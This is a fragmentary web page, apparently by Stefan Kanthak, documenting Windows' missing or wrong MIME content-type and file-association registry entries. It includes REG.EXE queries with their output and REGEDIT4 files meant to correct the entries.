ICACLS.EXE "%ProgramData%\Microsoft\MF\*"
C:\ProgramData\Microsoft\MF\ACTIVE.GRL NT AUTHORITY\INTERACTIVE:(R,W) NT AUTHORITY\SYSTEM:(R,W) BUILTIN\Administrators:(R,W,WDAC) NT AUTHORITY\LOCAL SERVICE:(R,W) NT SERVICE\TrustedInstaller:(F) C:\ProgramData\Microsoft\MF\PENDING.GRL NT AUTHORITY\INTERACTIVE:(R,W) NT AUTHORITY\SYSTEM:(R,W) BUILTIN\Administrators:(R,W,WDAC) NT AUTHORITY\LOCAL SERVICE:(R,W) NT SERVICE\TrustedInstaller:(F) Successfully processed 1 files; Failed processing 0 files
Chinese Whispersis known as
Telephone– in German speaking countries it is called
Stille Post.
application/msword for .doc and .dot,
application/rtf for .rtf,
application/vnd.microsoft.portable-executable for .exe and .dll etc.,
application/vnd.microsoft.windows.thumbnail-cache for thumbs.db,
application/vnd.ms-artgalry for .cil,
application/vnd.ms-asf for .asf,
application/vnd.ms-cab-compressed for .cab,
application/vnd.ms-3mfdocument for .3mf,
application/vnd.ms-excel for .xls and .xlt,
application/vnd.ms-excel.addin.macroEnabled.12 for .xlam,
application/vnd.ms-excel.sheet.binary.macroEnabled.12 for .xlsb,
application/vnd.ms-excel.sheet.macroEnabled.12 for .xlsm,
application/vnd.ms-excel.template.macroEnabled.12 for .xltm,
application/vnd.ms-fontobject for .eot,
application/vnd.ms-htmlhelp for .chm,
application/vnd.ms-ims for .ims,
application/vnd.ms-officetheme for .thmx,
application/vnd.ms-powerpoint for .pps and .ppt,
application/vnd.ms-powerpoint.addin.macroEnabled.12 for .ppam,
application/vnd.ms-powerpoint.presentation.macroEnabled.12 for .pptm,
application/vnd.ms-powerpoint.slide.macroEnabled.12 for .sldm,
application/vnd.ms-powerpoint.slideshow.macroEnabled.12 for .ppsm,
application/vnd.ms-powerpoint.template.macroEnabled.12 for .potm,
application/vnd.ms-project for .mpp,
application/vnd.ms-tnef for winmail.dat,
application/vnd.ms-word.document.macroEnabled.12 for .docm,
application/vnd.ms-word.template.macroEnabled.12 for .dotm,
application/vnd.ms-wpl for .wpl,
application/vnd.ms-xpsdocument for .xps,
audio/vnd.ms-playready.media.pya for .pya,
image/vnd.microsoft.icon for .ico,
image/vnd.ms-modi for .mdi,
text/vnd.ms-mediapackage for .mpf
and
video/vnd.ms-playready.media.pyv for .pyv.
MIME content alias media types for file extensions have to be registered since Windows NT 3.1 and Windows 95 with the following pair of Registry entries:
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.‹extension›]
"Content Type"="‹MIME type›"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\‹MIME type›]
"Extension"=".‹extension›" Start the Command Processor
Cmd.exe, then display the
MIME
content types registered with the 42 file extensions for which
Microsoft has a
MIME
content type assigned by
IANA:
FOR %? IN (.doc .dot .rtf .scr .exe .dll .cpl .ocx .mui .drv .sys .cil .asf .cab
.3mf .xls .xlt .xlam .xlsb .xlsm .xltm .eot .chm .ims .thmx .pps .ppt .ppam
.pptm .sldm .ppsm .potm .mpp .docm .dotm .wpl .xps .pya .ico .mdi .mpf .pyv) DO @(
REG.EXE QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Classes\%? /V "Content Type") 2>NUL:
Note: the command lines can be copied and pasted as
block into a Command Processor window.
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe
Content Type REG_SZ application/x-msdownload
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.dll
Content Type REG_SZ application/x-msdownload
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.asf
Content Type REG_SZ video/x-ms-asf
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.wpl
Content Type REG_SZ application/vnd.ms-wpl
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.xps
Content Type REG_SZ application/vnd.ms-xpsdocument
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.ico
Content Type REG_SZ image/x-icon
OUCH¹: only 6 of these 42 file extensions are
registered with their
MIME
content type – the 4 highlighted ones not
assigned by
IANA!
Display the file extensions registered with the MIME content types which Microsoft has assigned by IANA:
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/msword" /V "Extension" REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/rtf" /V "Extension" REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type" /F "vnd.microsoft" /K /S /V "Extension" REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type" /F "vnd.ms-" /K /S /V "Extension"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/msword
Extension REG_SZ .doc
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/rtf
Extension REG_SZ .rtf
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/vnd.ms-pki.certstore
Extension REG_SZ .sst
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/vnd.ms-pki.pko
Extension REG_SZ .pko
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/vnd.ms-pki.seccat
Extension REG_SZ .cat
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/vnd.ms-wpl
Extension REG_SZ .wpl
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\image/vnd.ms-dds
Extension REG_SZ .dds
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\image/vnd.ms-photo
Extension REG_SZ .wdp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\vnd.ms-pki.certstore
Extension REG_SZ .sst
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\vnd.ms-pki.pko
Extension REG_SZ .pko
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\vnd.ms-pki.seccat
Extension REG_SZ .cat
OUCH²: the
MIME
content type application/vnd.ms-xpsdocument for the
file extension .xps is missing!
OUCH³: the 5
MIME
content types application/vnd.ms-pki.* and
image/vnd.ms-* are not assigned by
IANA!
OUCH⁴: the 3
MIME
content types vnd.ms-pki.* are invalid
– their top-level media type is missing!
Create the text file whisper.reg with the following
content in an arbitrary, preferable empty directory:
REGEDIT4
; Copyright © 2004-2026, Stefan Kanthak <stefan.kanthak@nexgo.de>
[HKEY_CLASSES_ROOT\.cab]
"Content Type"="application/vnd.ms-cab-compressed"
[HKEY_CLASSES_ROOT\.chm]
"Content Type"="application/vnd.ms-htmlhelp"
[HKEY_CLASSES_ROOT\.com]
"Content Type"="application/x-msdos-program"
[HKEY_CLASSES_ROOT\.cpl]
"Content Type"="application/vnd.microsoft.portable-executable"
[HKEY_CLASSES_ROOT\.dll]
"Content Type"="application/vnd.microsoft.portable-executable"
[HKEY_CLASSES_ROOT\.eot]
"Content Type"="application/vnd.ms-fontobject"
"PerceivedType"="System"
[HKEY_CLASSES_ROOT\.exe]
"Content Type"="application/vnd.microsoft.portable-executable"
[HKEY_CLASSES_ROOT\.gz]
"Content Type"="application/gzip"
[HKEY_CLASSES_ROOT\.ico]
"Content Type"="image/vnd.microsoft.icon"
[HKEY_CLASSES_ROOT\.iso]
"Content Type"="application/x-iso9660-image"
"PerceivedType"="Application"
[HKEY_CLASSES_ROOT\.manifest]
"Content Type"="application/x-ms-manifest"
[HKEY_CLASSES_ROOT\.msi]
"Content Type"="application/x-ole-storage"
"PerceivedType"="System"
[HKEY_CLASSES_ROOT\.msm]
;@="MSI.MergeModule"
"Content Type"="application/x-ole-storage"
"PerceivedType"="System"
[HKEY_CLASSES_ROOT\.msp]
"Content Type"="application/x-ole-storage"
"PerceivedType"="System"
[HKEY_CLASSES_ROOT\.mst]
;@="MSI.Transform"
"Content Type"="application/x-ole-storage"
"PerceivedType"="System"
[HKEY_CLASSES_ROOT\.ocx]
"Content Type"="application/vnd.microsoft.portable-executable"
[HKEY_CLASSES_ROOT\.rdp]
"Content Type"="application/x-rdp"
"PerceivedType"="Text"
[HKEY_CLASSES_ROOT\.scr]
"Content Type"="application/vnd.microsoft.portable-executable"
"PerceivedType"="System"
[HKEY_CLASSES_ROOT\.sys]
"Content Type"="application/vnd.microsoft.portable-executable"
[HKEY_CLASSES_ROOT\.udf]
"Content Type"="application/x-iso13346-image"
"PerceivedType"="Application"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/gzip]
"Extension"=".gz"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/sql]
"Extension"=".sql"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/vnd.microsoft.icon]
"Extension"=".ico"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/vnd.microsoft.portable-executable]
"Extension"=".exe"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/vnd.ms-cab-compressed]
"Extension"=".cab"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/vnd.ms-fontobject]
"Extension"=".eot"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/vnd.ms-htmlhelp]
"Extension"=".chm"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-iso13346-image]
"Extension"=".udf"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-iso9660-image]
"Extension"=".iso"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-ms-manifest]
"Extension"=".manifest"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-msdos-program]
"Extension"=".com"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-ns-proxy-autoconfig]
"Extension"=".pac"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-ole-storage]
"Extension"=".msi"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-rdp]
"Extension"=".rdp"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/zip]
"Extension"=".zip"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\text/comma-separated-values]
"Extension"=".csv"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\text/csv]
"Extension"=".csv"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\text/markdown]
"Extension"=".md"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\text/tab-separated-values]
"Extension"=".tsv" Double-click the file whisper.reg created in
step 1. to merge its entries into the
Registry.
They but didn’t bother to register most of the file extensions supported by their own system applications!
Create the text file whisper.reg with the following
content in an arbitrary, preferable empty directory:
REGEDIT4
; Copyright © 2004-2026, Stefan Kanthak <stefan.kanthak@nexgo.de>
[HKEY_CLASSES_ROOT\SystemFileAssociations\.bat\OpenWithList\Cmd.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.bat\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.bat\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.bat\Shell\Open\Command]
@="C:\\Windows\\System32\\Cmd.exe /D /K Call \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.bat\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.chm\OpenWithList\HH.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.chm\Shell\Open\Command]
@="C:\\Windows\\HH.exe \"%L\""
; BUG: 'HH.exe -Decompile' fails with (properly) quoted file/pathname!
[HKEY_CLASSES_ROOT\SystemFileAssociations\.chm\Shell\Extract\Command]
@="C:\\Windows\\HH.exe -Decompile . %1"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.cmd\OpenWithList\Cmd.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.cmd\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.cmd\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.cmd\Shell\Open\Command]
@="C:\\Windows\\System32\\Cmd.exe /D /K Call \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.cmd\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.com\Shell\Open\Command]
@="\"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.cpl\OpenWithList\Control.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.cpl\Shell\CplOpen\Command]
@="C:\\Windows\\System32\\Control.exe \"%L\",%*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.cpl\Shell\RunAs\Command]
@="C:\\Windows\\System32\\RunDLL32.exe C:\\Windows\\System32\\Shell32.dll,Control_RunDLLAsUser \"%L\",%*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.exe\Shell\Open\Command]
@="\"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.hta\OpenWithList\MSHTA.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.hta\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.hta\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.hta\Shell\Open\Command]
@="C:\\Windows\\System32\\MSHTA.exe \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.hta\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.inf\OpenWithList\InfDefaultInstall.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.inf\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.inf\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.inf\Shell\Install\Command]
@="C:\\Windows\\System32\\InfDefaultInstall.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.inf\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.log]
"PerceivedType"="Text"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.js\OpenWithList\CScript.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.js\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.js\OpenWithList\WScript.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.js\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.js\Shell\Open\Command]
@="C:\\Windows\\System32\\WScript.exe \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.js\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.jse\OpenWithList\CScript.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.jse\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.jse\OpenWithList\WScript.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.jse\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.jse\Shell\Open\Command]
@="C:\\Windows\\System32\\WScript.exe \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.jse\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msc\OpenWithList\MMC.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msc\Shell\Author\Command]
@="C:\\Windows\\System32\\MMC.exe /A \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msc\Shell\Open\Command]
@="C:\\Windows\\System32\\MMC.exe \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msc\Shell\RunAs\Command]
@="C:\\Windows\\System32\\MMC.exe \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msi\OpenWithList\MSIExec.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msi\Shell\Extract\Command]
@="C:\\Windows\\System32\\MSIExec.exe /A \"%L\" TARGETDIR=\"%W\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msi\Shell\Open\Command]
@="C:\\Windows\\System32\\MSIExec.exe /I \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msi\Shell\RunAs\Command]
@="C:\\Windows\\System32\\MSIExec.exe /I \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msp\OpenWithList\MSIExec.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msp\Shell\Open\Command]
@="C:\\Windows\\System32\\MSIExec.exe /P \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msp\Shell\RunAs\Command]
@="C:\\Windows\\System32\\MSIExec.exe /P \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msu\OpenWithList\WUSA.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.msu\Shell\Open\Command]
@="C:\\Windows\\System32\\WUSA.exe \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.ps1\OpenWithList\PowerShell.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.ps1\Shell\Open\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.ps1\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.psc1\OpenWithList\PowerShell.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.psc1\Shell\Open\Command]
@="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShell.exe\" -p \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.rdp\OpenWithList\MSTSC.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.rdp\Shell\Connect\Command]
@="C:\\Windows\\System32\\MSTSC.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.rdp\Shell\Edit\Command]
@="C:\\Windows\\System32\\MSTSC.exe -Edit \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.rdp\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.reg\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.reg\OpenWithList\RegEdit.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.reg\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.reg\Shell\Open\Command]
@="C:\\Windows\\RegEdit.exe /M \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.reg\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.scp]
"PerceivedType"="Text"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.scr\Shell\Config]
@="C&onfigure"
"MUIVerb"="@C:\\Windows\\System32\\Shell32.dll,-10209"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.scr\Shell\Config\Command]
@="\"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.scr\Shell\Install]
@="&Install"
"MUIVerb"="@C:\\Windows\\System32\\Shell32.dll,-10210"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.scr\Shell\Install\Command]
@="\"C:\\Windows\\System32\\RunDLL32.exe\" \"C:\\Windows\\System32\\Desk.cpl\",InstallScreenSaver \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.scr\Shell\Open\Command]
@="\"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.sct]
"PerceivedType"="Text"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.sed\OpenWithList\IExpress.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.sed\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.sed\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.sed\Shell\Open\Command]
@="C:\\Windows\\System32\\IExpress.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.sed\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.vbe\OpenWithList\CScript.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.vbe\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.vbe\OpenWithList\WScript.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.vbe\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.vbe\Shell\Open\Command]
@="C:\\Windows\\System32\\WScript.exe \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.vbe\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.vbs\OpenWithList\CScript.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.vbs\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.vbs\OpenWithList\WScript.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.vbs\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.vbs\Shell\Open\Command]
@="C:\\Windows\\System32\\WScript.exe \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.vbs\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wsf\OpenWithList\CScript.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wsf\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wsf\OpenWithList\WScript.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wsf\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wsf\Shell\Open\Command]
@="C:\\Windows\\System32\\WScript.exe \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wsf\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wsh\OpenWithList\CScript.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wsh\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wsh\OpenWithList\WScript.exe]
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wsh\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wsh\Shell\Open\Command]
@="C:\\Windows\\System32\\WScript.exe \"%L\" %*"
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wsh\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_CLASSES_ROOT\SystemFileAssociations\.wtx]
"PerceivedType"="Text" Double-click the file whisper.reg created in
step 1. to merge its entries into the
Registry.
![[Screen shot of 'Default Programs' on Windows Vista]](https://docs.microsoft.com/en-us/previous-versions/images/bb776873.setassociationsforaprogramforlitware(en-us,vs.85).png "Screen shot of 'Default Programs' on Windows Vista")
With Windows Vista Microsoft enhanced the
Default Programs
control panel applet to manage associations for individual file
extensions supported by an application.
They but didn’t bother to enable this shiny new feature for
numerous standard applications like the
Command Processor,
Editor,
IExpress Wizard,
INF Default Installer,
HTML Application Host,
HTML Help Viewer,
Microsoft Management Console,
PowerShell,
Registry Editor,
Terminal Server Client,
Windows Installer,
Windows Script Host,
Windows Update Standalone Installer
and WordPad shipped and installed
with Windows since then more than 10 years.
Create the text file whisper.reg with the following
content in an arbitrary, preferable empty directory:
REGEDIT4
; Copyright © 1999-2026, Stefan Kanthak <stefan.kanthak@nexgo.de>
[HKEY_CLASSES_ROOT\.ddf]
@="ddffile"
"Content Type"="text/plain"
"PerceivedType"="text"
[HKEY_CLASSES_ROOT\ddffile]
@="Diamond Directives File"
[HKEY_CLASSES_ROOT\ddffile\Shell\Edit]
;@="&Edit"
[HKEY_CLASSES_ROOT\ddffile\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
[HKEY_CLASSES_ROOT\.sed]
@="sedfile"
"Content Type"="text/plain"
"PerceivedType"="text"
[HKEY_CLASSES_ROOT\.sed\OpenWithList\IExpress.exe]
[HKEY_CLASSES_ROOT\.sed\OpenWithList\NotePad.exe]
[HKEY_CLASSES_ROOT\.sed\OpenWithList\WordPad.exe]
[HKEY_CLASSES_ROOT\.sed\OpenWithProgIDs]
"WordPad.Document.1"=hex(0):
[HKEY_CLASSES_ROOT\.sed\PersistentHandler]
@="{5E941D80-BF96-11CD-B579-08002B30BFEB}"
[HKEY_CLASSES_ROOT\.sed\ShellNew]
"Command"="C:\\Windows\\System32\\IExpress.exe \"%L\""
[HKEY_CLASSES_ROOT\sedfile]
@="Self Extractor Directives"
[HKEY_CLASSES_ROOT\sedfile\Shell\Edit]
;@="&Edit"
[HKEY_CLASSES_ROOT\sedfile\Shell\Edit\Command]
@="C:\\Windows\\System32\\NotePad.exe \"%L\""
; BUG: 'IExpress.exe' fails with (properly) quoted file/pathname!
[HKEY_CLASSES_ROOT\sedfile\Shell\Open\Command]
@="C:\\Windows\\System32\\IExpress.exe %1"
[HKEY_CLASSES_ROOT\sedfile\Shell\Print\Command]
@="C:\\Windows\\System32\\NotePad.exe /P \"%L\""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\Capabilities]
"ApplicationDescription"="Command Processor"
"ApplicationName"="Command Processor"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\Capabilities\FileAssociations]
".bat"="batfile"
".cmd"="cmdfile"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\HTMLHelp\Capabilities]
"ApplicationDescription"="HTML Help"
"ApplicationName"="HTML Help"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\HTMLHelp\Capabilities\FileAssociations]
".chm"="chm.file"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IExpress Wizard\Capabilities]
"ApplicationDescription"="IExpress Wizard"
"ApplicationName"="IExpress Wizard"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IExpress Wizard\Capabilities\FileAssociations]
".sed"="sedfile"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\INF Default Install Application\Capabilities]
"ApplicationDescription"="INF Default Install Application"
"ApplicationName"="INF Default Install Application"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\INF Default Install Application\Capabilities\FileAssociations]
".inf"="inffile"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft Management Console\Capabilities]
"ApplicationDescription"="@C:\\Windows\\System32\\MMC.exe,-128"
"ApplicationName"="@C:\\Windows\\System32\\MMC.exe,-128"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft Management Console\Capabilities\FileAssociations]
".msc"="mscfile"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft HTML Application Host\Capabilities]
"ApplicationDescription"="@C:\\Windows\\System32\\MSHTA.exe,-6412"
"ApplicationName"="@C:\\Windows\\System32\\MSHTA.exe,-6412"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft HTML Application Host\Capabilities\FileAssociations]
".hta"="htafile"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NotePad\Capabilities]
"ApplicationDescription"="@C:\\Windows\\System32\\NotePad.exe,-9"
"ApplicationName"="@C:\\Windows\\System32\\NotePad.exe,-9"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NotePad\Capabilities\FileAssociations]
".log"="txtfile"
".scp"="txtfile"
".txt"="txtfile"
".wtx"="txtfile"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\Capabilities]
"ApplicationDescription"="@C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShell.exe,-111"
"ApplicationName"="@C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShell.exe,-109"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\Capabilities\FileAssociations]
".ps1"="Microsoft.PowerShellScript.1"
".ps1xml"="Microsoft.PowerShellXMLData.1"
".psc1"="Microsoft.PowerShellConsole.1"
